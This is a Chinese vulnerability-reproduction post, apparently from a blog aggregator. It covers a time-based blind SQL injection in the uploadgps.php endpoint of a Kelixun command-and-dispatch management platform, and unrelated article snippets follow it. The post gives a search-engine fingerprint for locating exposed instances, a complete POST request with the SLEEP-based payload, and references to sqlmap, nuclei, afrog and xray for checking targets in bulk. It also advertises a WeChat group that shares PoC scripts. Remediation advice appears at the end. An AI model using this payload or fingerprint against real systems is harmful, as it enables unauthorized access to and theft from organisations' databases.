当前位置: 首页 > news >正文

【漏洞复现】科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入

news 2026/5/14 21:30:38

0x01 产品简介

科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。

0x02 漏洞概述

福建科立讯通信有限公司指挥调度管理平台uploadgps.php接口处存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性,甚至获取对数据库的完全控制。

0x03 搜索引擎

body="指挥调度管理平台"

在这里插入图片描述

0x04 漏洞复现

POST /api/client/task/uploadgps.php HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 70uuid=&gps=1'+AND+(SELECT+7679+FROM+(SELECT(SLEEP(5)))ozYR)+AND+'fqDZ'='fqDZ&number=

在这里插入图片描述

sqlmap验证

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、使用参数化查询:使用参数化的 SQL 查询语句,而不是将用户输入直接拼接到 SQL 语句中。这可以防止恶意输入被误解为 SQL 代码。
2、输入验证和过滤:对用户输入的数据进行严格的验证和过滤,确保输入的数据符合预期格式和类型。
3、最小权限原则:确保数据库连接使用的账户具有最小必要的权限,避免使用具有过高权限的账户。

相关文章:

【漏洞复现】科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入

0x01 产品简介 科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、…...

编程日记 2024/6/29 21:09:53

什么是自然语言处理(NLP)?详细解读文本分类、情感分析和机器翻译的核心技术

什么是自然语言处理? 自然语言处理(Natural Language Processing,简称NLP)是人工智能的一个重要分支,旨在让计算机理解、解释和生成人类的自然语言。打个比方,你和Siri对话,或使用谷歌翻译翻译一…...

编程日记 2024/6/29 21:07:51

【linux】gcc快速入门教程

目录 一.gcc简介 二.gcc常用命令 一.gcc简介 gcc 是GNU Compiler Collection(GNU编译器套件)。就是一个编译器。编译一个源文件的时候可以直接使用,但是源文件数量太多时,就很不方便,于是就出现了make 工具 二.gcc…...

编程日记 2024/6/29 21:06:50

【多维动态规划】Leetcode 97. 交错字符串【中等】

交错字符串 给定三个字符串 s1、s2、s3,请你帮忙验证 s3 是否是由 s1 和 s2 交错 组成的。 两个字符串 s 和 t 交错 的定义与过程如下,其中每个字符串都会被分割成若干 非空 子字符串 子字符串 是字符串中连续的 非空 字符序列。 s s1 s2 … snt…...

编程日记 2024/6/29 21:05:49

【JavaScript脚本宇宙】精通前端开发:六大热门CSS框架详解

前端开发的利器:深入了解六大CSS框架 前言 在现代Web开发中,选择适合的前端框架和工具包是构建高效、响应式和美观的网站或应用程序的关键。本文将详细介绍六个广受欢迎的CSS框架:Bootstrap、Bulma、Tailwind CSS、Foundation、Materialize…...

编程日记 2024/6/29 21:04:48

开发技术-Java集合(List)删除元素的几种方式

文章目录 1. 错误的删除2. 正确的方法2.1 倒叙删除2.2 迭代器删除2.3 removeAll() 删除2.4 removeIf() 最简单的删除 3. 总结 1. 错误的删除 在写代码时,想将其中的一个元素删除,就遍历了 list ,使用了 remove(),发现效果并不是想…...

编程日记 2024/6/29 21:03:47

c++ 递归

递归函数是指在函数定义中调用自身的函数。C语言也支持递归函数。 下面是一个使用递归函数计算阶乘的例子&#xff1a; #include <iostream> using namespace std;int factorial(int n) {// 基本情况&#xff0c;当 n 等于 0 或 1 时&#xff0c;阶乘为 1if (n 0 || n…...

编程日记 2024/6/29 21:01:45

RedHat9 | podman容器

1、容器技术介绍 传统问题 应用程序和依赖需要一起安装在物理主机或虚拟机上的操作系统应用程序版本比当前操作系统安装的版本更低或更新两个应用程序可能需要某一软件的不同版本&#xff0c;彼此版本之间不兼容 解决方式 将应用程序打包并部署为容器容器是与系统的其他部分…...

编程日记 2024/6/29 21:00:43

边缘计算项目有哪些

边缘计算项目在多个领域得到了广泛的应用&#xff0c;以下是一些典型的边缘计算项目案例&#xff1a; 1. **智能交通系统**&#xff1a;通过在交通信号灯、监控摄像头等设备上部署边缘计算&#xff0c;可以实时分析交通流量&#xff0c;优化交通信号控制&#xff0c;减少拥堵&…...

编程日记 2024/6/29 20:56:39

计算fibonacci数列每一项时所需的递归调用次数

斐波那契数列是一个经典的数列&#xff0c;其中每一项是前两项的和&#xff0c;定义为&#xff1a; [ F(n) F(n-1) F(n-2) ] 其中&#xff0c;( F(0) 0 ) 和 ( F(1) 1 )。 对于计算斐波那契数列的第 ( n ) 项&#xff0c;如果使用简单的递归方法&#xff0c;其时间复杂度是…...

编程日记 2024/6/29 20:53:36

【教学类65-05】20240627秘密花园涂色书(中四班练习)

【教学类65-03】20240622秘密花园涂色书03&#xff08;通义万相&#xff09;&#xff08;A4横版1张&#xff0c;一大 68张纸136份&#xff09;-CSDN博客 背景需求: 打印以下几款秘密花园样式&#xff08;每款10份&#xff09;给中四班孩子玩一下&#xff0c;看看效果 【教学类…...

编程日记 2024/6/29 20:51:33

Python 学习之基础语法(一)

Python的语法基础主要包括以下几个方面&#xff0c;下面将逐一进行分点表示和归纳&#xff1a; 一、基本语法 1. 注释 a. 单行注释&#xff1a;使用#开头&#xff0c;例如# 这是一个单行注释。 b. 多行注释&#xff1a;使用三引号&#xff08;可以是三个单引号或三个双引号&…...

编程日记 2024/6/29 20:49:31

日志分析-windows系统日志分析

日志分析-windows系统日志分析 使用事件查看器分析Windows系统日志 cmd命令 eventvwr 筛选 清除日志、注销并重新登陆&#xff0c;查看日志情况 Windows7和Windowserver2008R2的主机日志保存在C:\Windows\System32\winevt\Logs文件夹下&#xff0c;Security.evtx即为W…...

编程日记 2024/6/29 20:48:30

【ARM】MDK工程切换高版本的编译器后出现error A1137E报错

【更多软件使用问题请点击亿道电子官方网站】 1、 文档目标 解决工程从Compiler 5切换到Compiler 6进行编译时出现一些非语法问题上的报错。 2、 问题场景 对于一些使用Compiler 5进行编译的工程&#xff0c;要切换到Compiler 6进行编译的时候&#xff0c;原本无任何报错警告…...

编程日记 2024/6/29 20:47:28

深入 SSH:解锁本地转发、远程转发和动态转发的潜力

文章目录 前言一、解锁内部服务&#xff1a;SSH 本地转发1.1 什么是 SSH 本地转发1.2 本地转发应用场景 二、打开外部访问大门&#xff1a;SSH 远程转发2.1 什么是 SSH 远程转发2.2 远程转发应用场景 三、动态转发&#xff1a;SSH 让你拥有自己的 VPN3.1 什么是 SSH 动态转发3.…...

编程日记 2024/6/29 20:43:23

python如何把一个函数的返回值,当成这个函数的参数值

python如何把一个函数的返回值&#xff0c;当成这个函数的参数值 1. 递归调用 递归是一种函数自己调用自己的方法。在递归调用中&#xff0c;你可以将前一次调用的返回值作为下一次调用的参数。 def recursive_function(x):# 函数逻辑if 条件满足:return 结果else:return rec…...

编程日记 2024/6/29 20:42:22

【融合ChatGPT等AI模型】Python-GEE遥感云大数据分析、管理与可视化及多领域案例应用

随着航空、航天、近地空间遥感平台的持续发展&#xff0c;遥感技术近年来取得显著进步。遥感数据的空间、时间、光谱分辨率及数据量均大幅提升&#xff0c;呈现出大数据特征。这为相关研究带来了新机遇&#xff0c;但同时也带来巨大挑战。传统的工作站和服务器已无法满足大区域…...

编程日记 2024/6/29 20:41:21

SpringBoot: Eureka入门

1. IP列表 公司发展到一定的规模之后&#xff0c;应用拆分是无可避免的。假设我们有2个服务(服务A、服务B)&#xff0c;如果服务A要调用服务B&#xff0c;我们能怎么做呢&#xff1f;最简单的方法是让服务A配置服务B的所有节点的IP&#xff0c;在服务A内部做负载均衡调用服务B…...

编程日记 2024/6/29 20:40:19

Typescript 【实用教程】(2024最新版)含类型声明,类型断言,函数,接口,泛型等

简介 TypeScript 是 JavaScript 的超集&#xff0c;是 JavaScript&#xff08;弱类型语言&#xff09; 的强类型版本。 拥有类型机制文件后缀 .tsTypescript type ES6TypeScript 和 JavaScript 的关系类似 less 和 css 的关系TypeScript对 JavaScript 添加了一些扩展&#x…...

编程日记 2024/6/29 20:39:18

智慧校园-实训管理系统总体概述

智慧校园实训管理系统&#xff0c;专为满足高等教育与职业教育的特定需求而设计&#xff0c;它代表了实训课程管理领域的一次数字化飞跃。此系统旨在通过革新实训的组织结构、执行流程及评估标准&#xff0c;来增强学生的实践操作技能和教师的授课效率&#xff0c;为社会输送具…...

编程日记 2024/6/29 20:36:15

Taotoken 的用量看板如何帮助开发者优化模型调用策略

&#x1f680; 告别海外账号与网络限制&#xff01;稳定直连全球优质大模型&#xff0c;限时半价接入中。 &#x1f449; 点击领取海量免费额度 Taotoken 的用量看板如何帮助开发者优化模型调用策略 1. 引言&#xff1a;从“盲用”到“明察” 在集成大模型 API 进行开发时&am…...

编程新知 2026/5/14 21:06:08

开源OpenAI用量查询工具部署指南:实现API成本透明化管理

1. 项目概述与核心价值 最近在折腾OpenAI API的时候&#xff0c;发现一个挺实际的需求&#xff1a;怎么方便地查自己API Key的余额和用量明细&#xff1f;官方Dashboard虽然功能全&#xff0c;但有时候就想快速看一眼&#xff0c;或者团队里几个人共用一个额度池&#xff0c;想…...

编程新知 2026/5/14 20:21:13

STL文件可视化革命:stl-thumb技术解析与实践指南

STL文件可视化革命&#xff1a;stl-thumb技术解析与实践指南 【免费下载链接】stl-thumb Thumbnail generator for STL files 项目地址: https://gitcode.com/gh_mirrors/st/stl-thumb 在3D打印和计算机辅助设计的日常工作中&#xff0c;设计师和工程师们面临着一个共同…...

编程新知 2026/5/14 20:15:02

如何突破网盘下载速度限制:LinkSwift直链解析工具全攻略

如何突破网盘下载速度限制&#xff1a;LinkSwift直链解析工具全攻略 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 &#xff0c;支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天…...

编程新知 2026/5/14 19:07:57

CATIA多实体零件自动化拆分:pyCATIA解决复杂几何体管理的技术挑战

CATIA多实体零件自动化拆分&#xff1a;pyCATIA解决复杂几何体管理的技术挑战 【免费下载链接】pycatia python module for CATIA V5 automation 项目地址: https://gitcode.com/gh_mirrors/py/pycatia 在航空航天、汽车制造和复杂机械设计领域&#xff0c;工程师经常面…...

编程新知 2026/5/14 18:50:50

《C语言字符串与内存函数详解与模拟实现》

C语言字符串函数和内存函数字符串函数strcat详解模拟实现strcmp详解模拟实现strcpy详解模拟实现strstr详解模拟实现strtok详解strncat详解模拟实现strncmp详解模拟实现strncpy详解模拟实现内存函数memcpy详解模拟实现memmove详解模拟实现memset详解这篇博客我将讲解C语言中常见…...

编程新知 2026/5/14 18:40:35

MCP9600热电偶测温:从塞贝克效应到工业应用实战

1. 项目概述与核心价值在嵌入式开发和工业测量领域&#xff0c;温度是一个最基础也最关键的物理量。从3D打印机的热床监控&#xff0c;到化学反应釜的温度控制&#xff0c;再到家用烤箱的精准烘焙&#xff0c;可靠的温度测量无处不在。然而&#xff0c;当我们需要测量的温度范围…...

编程新知 2026/5/14 18:23:51

用74LS181和6116芯片手把手复现计算机累加器:从开关输入到结果存储的完整数据通路实验

从零构建计算机累加器&#xff1a;74LS181与6116芯片的硬件交响曲 当我们在现代计算机上轻敲键盘时&#xff0c;屏幕上的数字几乎瞬间完成运算&#xff0c;这背后是一套精密的硬件舞蹈。而这场舞蹈的核心演员之一&#xff0c;就是累加器——这个看似简单的寄存器&#xff0c;实…...

编程新知 2026/5/14 17:38:25

如何快速掌握WPR机器人仿真:ROS仿真开发的完整解决方案

如何快速掌握WPR机器人仿真&#xff1a;ROS仿真开发的完整解决方案 【免费下载链接】wpr_simulation 项目地址: https://gitcode.com/gh_mirrors/wp/wpr_simulation 想要在ROS环境中进行机器人仿真开发却苦于缺乏合适的工具&#xff1f;WPR仿真工具为你提供了一个功能完…...

编程新知 2026/5/14 16:36:10

深度解析magnetW磁力搜索:3大架构优化与5个实战技巧

深度解析magnetW磁力搜索&#xff1a;3大架构优化与5个实战技巧 【免费下载链接】magnetW [已失效&#xff0c;不再维护] 项目地址: https://gitcode.com/gh_mirrors/ma/magnetW magnetW作为一款基于Electron构建的跨平台磁力搜索工具&#xff0c;通过聚合多个BT源站实现…...

编程新知 2026/5/14 16:16:04